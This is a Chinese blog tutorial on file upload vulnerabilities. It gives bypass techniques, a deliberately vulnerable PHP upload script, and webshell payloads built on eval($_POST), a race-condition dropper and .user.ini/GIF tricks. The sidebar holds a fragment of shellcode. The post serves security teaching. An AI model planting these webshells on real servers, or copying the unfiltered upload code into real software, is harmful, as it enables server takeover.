文件上传

最新推荐文章于 2024-01-28 10:00:00 发布
最新推荐文章于 2024-01-28 10:00:00 发布
阅读量252 收藏
点赞数
分类专栏: web漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43152809/article/details/110497151
版权

什么是文件上传漏洞

在现代互联网的web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率。比如企业的OA系统,允许用户上传图片、视频、头像和许多其他相关类型的文件。然而向用户提供的功能越多,web应用收到攻击的可能性就越大,如果web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获得网站的权限,或进一步危害服务器

为什么文件上传存在漏洞

上传文件时,如果服务端代码未对客户端上传的文件进行严格过滤,就容易造成文件上传漏洞

绕过限制

apache解析从右到左开始解析,若文件名类似1.php.xxxxx,xxxxx无法解析,所以向左解析php

$_FILES[“file”][“type”]是客户端请求数据包中的Content-Type,所以可以使用burp抓包将Content-Type更改就可以绕过限制

绕过getimagesize()

getimagesize()可以获得图片的宽、高等信息,如果上传的不是图片文件,那么getimagesize()就获取不到信息,则不允许上传

但是可以将一个图片和一个webshell合并为一个文件

例如:

cat image.png webshell.php >image.php

此时,使用此函数就可以获得图片信息,且webshell的后缀是php,也能被apache解析为脚本文件,就可以绕过getimagesize函数的限制

<?php
error_reporting(0);
$ext_arr=array('flv','swf','mp3','mp4','3gp','zip','rar','gif','jpg','png','bmp');
$file_ext = substr($_FILES['file']['name'],strrpos($_FILES['file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
    $tempFile=$_FILES['file']['tmp_name'];
    $targetPath = "/upload".$_REQUEST['jieduan'].rand(10,99).data("YmdHis").".".$file_ext;
    //$_REQUEST['jieduan']造成可以利用截断上传
    if(move_uploaded_file($tempFile,$targetPath)){
        echo '上传成功'.'<br>';
        echo '路径:'.$targetPath;
    }
    else{
        echo("上传失败");
    }

}
else{
    echo("不允许的后缀");
}
?>

在多数情况下,截断绕过都是在文件名后面加上HEX形式的%00来测试,例如filename=‘1.php%00.jpg’,但是由于在php中,$_FILE['file][‘name’]在得到文件名时,%00之后的内容已经被截断了,所以 $_FILE['file][‘name’]得到的后缀是php,而不是php%00.jpg,因此不能通过

if(in_array($file_ext,$ext_arr))

的限制
所以在进行截断时,不能直接在文件后面加%00,而应该更改hex

竞争条件攻击

一些网站上传文件的逻辑是先允许上传任意文件,然后检查上传的文件是否包含webshell脚本,如果包含则删除该文件,这里存在的问题是文件上传成功后和删除文件之间存在一个短的时间差,就可以利用这个时间差完成竞争条件的上传漏洞攻击
举个栗子:
攻击者首先上传一个webshell脚本10.php,10.php的内容是生成一个新的webshell脚本shell.php,代码如下

<?php
fputs(fopen('../shell.php','w'),'<php @eval($_POST[a])  ?>');

当10.php上传成功后,客户端立即访问10.php,那么会在当前目录下自动生成shell.php,此时就利用时间差完成了webshell的上传

还可以利用.user.ini文件完成文件上传的操作

诸如:
.user.ini

GIF 89a
auto_prepend_file=01.gif

01.gif

GIF89a
<script language="php">eval($_POST['123']);</script>

利用.htaccess文件绕过限制:
https://www.jianshu.com/p/c674904a711e

aur03a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dll劫持
qq_46804551的博客
05-04 5810
aheadlib工具劫持 可以看见生成了一个cpp文件,然后我们创建一个dll文件 将生成的cpp文件替换到如下文件 添加#include “pch.h” 填加如下代码 /* cs的payload length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
dll 劫持和应用研究
顶峰
03-31 689
2020年12月,SolarWinds 攻击事件引发全球的关注(),攻击团队在 2020年上旬通过对 SolarWinds Orion产品实现供应链攻击,导致诸多厂商被攻击,造成了不可估量的损失。这种国家间的 APT 攻击包含了大量的技术细节,其中供应链攻击的实现,也就是 SUNBURST 后门植入这一块引起了我极大的兴趣。
DLL劫持&CS上线主机
qq_45317844的博客
10-30 396
百度百科:DLL的全称是Dynamic Link Library, 中文叫“动态链接文件”。在Windows操作系统中, DLL对于程序执行是非常重要的, 因为程序在执行的时候, 必须链接到DLL文件, 才能够正确地运行。而有些DLL文件可以被许多程序共用。因此, 程序设计人员可以利用DLL文件, 使程序不至于太过巨大。但是当安装的程序越来越多, DLL文件也就会越来越多, 如果当你删除程序的时候, 没有用的DLL文件没有被删除的话, 久而久之就造成系统的负担了。
dll劫持的实现原理
milk416666的博客
08-31 369
DLL劫持攻击的基本思想是:将恶意代码注入到目标进程中,然后在目标进程中使用LoadLibrary()函数加载一个合法的DLL文件,但实际上却加载了恶意代码生成的假DLL文件。当目标进程调用DLL中的函数时,实际上是在调用恶意代码中的函数,从而实现对目标进程的控制和窃取信息等恶意行为。当目标进程尝试加载一个未被授权的DLL文件时,系统会抛出异常并终止该进程。DLL劫持是一种常见的攻击技术,它利用Windows操作系统中DLL加载机制的漏洞,将恶意代码注入到合法进程中,并在运行时劫持和控制目标进程的执行。
JSP 文件上传
01-20
JSP 文件上传 JSP 可以与 HTML form 标签一起使用,来允许用户上传文件到服务器。上传的文件可以是文本文件或图像文件或任何文档。 本章节我们使用 Servlet 来处理文件上传,使用到的文件有: upload.jsp : 文件上传...
ruoyi实现大文件上传
最新发布
04-24
ruoyi实现大文件上传
thinkjs 文件上传功能实例代码
10-19
ThinkJS 是一款面向未来开发的 Node.js 框架,整合了大量的项目最佳实践,让企业级开发变得如此简单、高效。接下来通过本文给大家分享thinkjs 文件上传功能,需要的朋友参考下吧
QFtp实现批量文件上传
06-22
示例包含了FTP登录,为方便演示,...Demo功能包括:选择文件夹进行批量上传文件,列举FTP服务器上的所有文件,以及文件实时上传进度 这几个重要功能。其实QFTP还提供了很多其他接口,用法都是差不多的,可以举一反三。
NetCore 3.0文件上传和大文件上传限制详解
01-02
NetCore文件上传两种方式  NetCore官方给出的两种文件上传方式分别为“缓冲”、“流式”。我简单的说说两种的区别,  1.缓冲:通过模型绑定先把整个文件保存到内存,然后我们通过IFormFile得到stream,优点是效率...
浅谈dll劫持免杀
记录学习,一起进步
11-25 1278
浅谈dll劫持-白加黑免杀指南
逆向破解之破解补丁与劫持Dll
xf555er的博客
08-22 5101
有些加了壳的程序会导致其在未完全解密完成的情况下出现如下汇编代码当软件运行后,其真正的汇编代码才会呈现出来,也就是我们常说的“吐壳”在程序没有把壳完全吐出来前,我们需要通过代码来判断这个程序是否吐完壳了,最好的方法就是判断某个内存地址的值是否是解密完成后的值这里我就选4010F0内存地址的值53来判断程序是否吐完壳了简单来说劫持dll就是劫持系统的dll,弄一个包含恶意代码的dll来伪装成系统dll,然后把这个dll和程序放在同一目录,程序会优先调用含有恶意代码的dll本次实例演示劫持系统的。
DLL劫持
Armandhe的博客
07-21 1524
dll劫持牛逼啊,权限维持好方法,可以劫持一些开机自弃的程序的dll文件,然后只要对方主机上线那么他就成了你的肉鸡
文件上传漏洞原理与实践练习题
weixin_54217081的博客
12-13 1221
一.单选 1.IIS默认的Web目录是( C ) A.C:\phpStudy\PHPTutorial\WWW B.C:\xampp\htdocs C.C:\Inetpub\wwwroot D./var/www/html
DLL劫持原理&防御方法
热门推荐
安全杂货铺
05-18 2万+
1.原理介绍 DLL劫持指的是,病毒通过一些手段来劫持或者替换正常的DLL,欺骗正常程序加载预先准备好的恶意DLL。 如下图,LPK.dll是应用程序运行所需加载的DLL,该系统文件默认在C:\Windows\system32路径下,但由于windows优先搜索当前路径,所以当我们把恶意LPK.dll放在应用程序同一路径下,便会被程序成功加载,从而执行恶意操作。 2.实例分析 下面以APT32攻...
本地微信DLL劫持提权复现
weixin_46686336的博客
11-11 272
DLL劫持提权、Windows提权
DLL劫持之IAT类型(Loadlibrary)
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-28 247
标志相类似,因为系统只是将DLL映射到进程的地址空间中,就像它是数据文件一样。系统并不花费额外的时间来准备执行文件中的任何代码。: 这个标志用于告诉系统将DLL映射到调用进程的地址空间中,但是不调用DllMain并且不加载依赖Dll(只映射自己本身)。: 从%windows%\system32加载Dll和其依赖项。: 应用程序安装路径搜索Dll和其依赖项。设置的路径(保护Dll自己和依赖Dll)。跟到0环可以发现,在转换之后可以得到路径。,也就是说加载dll首先会加载锁,再调用。: 搜索路径的使用使用。
Dll劫持
weixin_41204880的博客
07-27 247
** 1、 dll文件是什么? ** DLL(Dynamic Link Library)文件为动态链接库文件,又称"应用程序拓展",是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件,一个DLL文件也可能被不同的应用程序使用,这样的DLL文件被称为共享DLL文件。 如果在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windo
DLL搜索的目录顺序(DLL劫持)
WLINX
08-23 1328
DLL劫持是技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,如果没找到,则在Windows系统目录中查找,最后是在环境变量中列出的各个目录下查找。(...
buuctf文件上传
03-10
buuctf文件上传是指在buuctf平台上进行文件上传的操作。buuctf是一个CTF(Capture The Flag)比赛平台,用于进行网络安全技术的竞赛和学习。文件上传是CTF比赛中的一种常见题型,通过上传恶意文件或者利用文件上传...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值